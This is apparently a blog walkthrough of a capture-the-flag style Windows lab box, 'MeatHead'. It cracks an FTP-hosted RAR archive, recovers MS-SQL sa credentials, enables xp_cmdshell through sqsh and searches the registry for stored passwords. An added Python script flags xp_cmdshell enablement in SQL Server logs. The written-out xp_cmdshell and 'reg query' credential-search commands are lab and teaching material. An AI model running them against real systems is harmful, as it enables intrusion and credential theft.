40. MeatHead (HARD) - Windows (rar, rar2john, sqsh, xp_cmdshell, registry search)
1. Enumeration
: Nmap
![](https://blog.kakaocdn.net/dn/eb4ORN/btrLKgX1cSp/a73TgmXYeK7omFvwqR7i40/img.png)
> 80 : plantronics
> hostname : meathead
: smb enum
![](https://blog.kakaocdn.net/dn/bpvTfY/btrLJZoF3yd/xoa7VkEKEbJxNxGnKoqZmk/img.png)
: web enum
![](https://blog.kakaocdn.net/dn/cYNNge/btrLLZtGqNg/HHFnqKTVKAl8Bjc1B1o8k1/img.png)
![](https://blog.kakaocdn.net/dn/wfLUV/btrLK4WPbIp/PfznsMGc6wcejcuiuqIRWk/img.png)
> Trying to log in
![](https://blog.kakaocdn.net/dn/sxC4j/btrLLYO41SF/dkjaqGKMxmABjfVfOvXdHK/img.png)
: ftp enum
![](https://blog.kakaocdn.net/dn/Rk9Qf/btrLKxZrR3V/rdXKWIEPZfemFkyRFTiAL0/img.png)
> After downloading and inspecting it
![](https://blog.kakaocdn.net/dn/dA7Run/btrLJZPJHoF/swkwIfAh6kIPXlQikQVSMK/img.png)
![](https://blog.kakaocdn.net/dn/79Z5x/btrLKhbwiVF/AmrJQ7qTbbirJgVCdsEksK/img.png)
> It is password-protected
2. Exploitation
: Cracking
![](https://blog.kakaocdn.net/dn/D7ldV/btrLJLKXGCg/PsgTyR2lbjNIVM7QCdQrjk/img.png)
> Convert it into a crackable hash format and run the cracker
![](https://blog.kakaocdn.net/dn/wXIy0/btrLKxytLCO/6I1Dp96C5ipFvBmTb7M9S0/img.png)
> Success!
Trying unrar with the recovered password
![](https://blog.kakaocdn.net/dn/N2KUO/btrLLhImQ39/9KK81w6E3m0PWZlm6BJNfK/img.png)
> There is a backup file; opening it
![](https://blog.kakaocdn.net/dn/TPztu/btrLJK6ouqY/0jHii53mVtEBpLlTHCkfRk/img.png)
> MS-SQL creds found!
: Running system commands with SQShell (sqsh)
Method 1) Connect directly
![](https://blog.kakaocdn.net/dn/FrNbN/btrLKxkTJfj/PoQFfSnM1eULHBHIKVyf70/img.png)
Method 2) Set up the config, create .sqshrc, then connect
: config setup
![](https://blog.kakaocdn.net/dn/dz9lOJ/btrLKFCYFFm/mHECP1gN1AJKGdVkPxMuN1/img.png)
![](https://blog.kakaocdn.net/dn/cnzNOV/btrLKE48O7r/or9L6WkZJ61xPBiqvnjZR0/img.png)
: Create .sqshrc
![](https://blog.kakaocdn.net/dn/wz46p/btrLK43yp2p/2ySZ9cgWZ6YNfSE52VLkXk/img.png)
: Trying to connect
![](https://blog.kakaocdn.net/dn/cv0GKJ/btrLKxFbWap/vbHmgW52tDY1phZDrwcoC1/img.png)
Success!
Either method works!
# Running OS commands with sqsh
(Since the creds are for the sa user, OS command execution via xp_cmdshell is possible!)
1) Check the version
root@takudaddy:~# sqsh -S Meathead
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> SELECT @@VERSION;
2> go
: Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
Aug 22 2017 17:04:49
Copyright (C) 2017 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
(1 row affected)
1>
2) Enable xp_cmdshell
1> EXEC sp_configure 'show advanced option', '1';
2> go
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE WITH OVERRIDE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'show advanced option';
2> go
name: show advanced options
minimum: 0
maximum: 1
config_value: 1
run_value: 1
(return status = 0)
1>
: Test command execution after enabling it
![](https://blog.kakaocdn.net/dn/bHKbEv/btrLJLdaaLt/jj5PMR2PqZ27kczqOnGVP1/img.png)
> Works!
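A defensive note added here (not part of the original writeup): the "changed from 1 to 1" lines in the sqsh session mean xp_cmdshell was already enabled on this host before the session, and the same sp_configure messages are written to the SQL Server ERRORLOG, where they can be alerted on. The script below is an added example that parses such lines; the timestamp/spid prefix format and the sample log excerpt are constructed assumptions, not output from the target.

```python
import re
from dataclasses import dataclass
from typing import List

# sp_configure audit line as written to the SQL Server ERRORLOG. The message
# text is the one sqsh echoed above; the leading timestamp/spid layout is an
# assumption (field spacing varies between versions).
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Server options whose enablement is worth an alert; the writeup only
# uses xp_cmdshell, the other two are common follow-ons of the same kind.
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

@dataclass
class Finding:
    ts: str
    spid: str
    option: str
    old: int
    new: int
    verdict: str  # "enabled" (0 -> 1) or "already-enabled" (1 -> 1, as on this box)

def scan_errorlog(lines: List[str]) -> List[Finding]:
    """Return one Finding per watched option that ends up enabled."""
    findings = []
    for line in lines:
        m = CONFIG_CHANGE.match(line)
        if not m or m["option"] not in WATCHED:
            continue
        old, new = int(m["old"]), int(m["new"])
        if new != 1:
            continue  # a change back to 0 is remediation, not a finding
        verdict = "enabled" if old == 0 else "already-enabled"
        findings.append(Finding(m["ts"], m["spid"], m["option"], old, new, verdict))
    return findings

# Constructed sample ERRORLOG excerpt (not taken from the target machine).
SAMPLE_LOG = """\
2022-09-01 10:15:02.11 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-09-01 10:15:03.20 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-09-01 10:20:44.07 spid58      Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
2022-09-01 10:25:00.00 spid58      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-09-01 10:26:12.90 spid60      Using 'dbghelp.dll' version '4.0.5'
""".splitlines()

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_LOG):
        print(f"{f.ts} {f.spid}: {f.option} {f.old}->{f.new} ({f.verdict})")
```

A "1 -> 1" hit is still worth a ticket: it shows the option was left enabled earlier and someone is reconfirming it, exactly what this session did.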
3) Local Enum
: systeminfo
![](https://blog.kakaocdn.net/dn/cUzQkh/btrLKI0Kffz/Hr8y3F5ZNDVMpv8bWqLFUk/img.png)
: User search - net user
![](https://blog.kakaocdn.net/dn/bXF97s/btrLK4P1OJA/XkCIfqYyMRrOEtq7H7CQ7k/img.png)
> jane
: Password search - reg query
Search the registry for a specific keyword (pass)
reg query HKLM /f pass /t REG_SZ /s
> Too much output, so the search term was changed and the query re-run
![](https://blog.kakaocdn.net/dn/bnW5Iy/btrLLXWWgXq/kkdnKGIAEHeSjykAkWkNHK/img.png)
> Twil*************234
: RDP connection
![](https://blog.kakaocdn.net/dn/b96bzL/btrLK0UpGlL/R11KEWkSXXfE9kXVsxOOCK/img.png)
> Foothold obtained!
3. Privilege Escalation
The Nmap results identified port 80 as plantronics; searching for related exploits turns up a PoC, and
![](https://blog.kakaocdn.net/dn/brHbEz/btrLLyb1bRR/JKJjQRreekwbzmoqLZHaw0/img.png)
following its instructions
![](https://blog.kakaocdn.net/dn/8u56X/btrLKFJMn9Z/MPqDvn4OepPx1S52KaPdKK/img.png)
![](https://blog.kakaocdn.net/dn/TxCpj/btrLK0NCka9/bS9h7EpFG8EFKqIY1IZ58k/img.png)
Done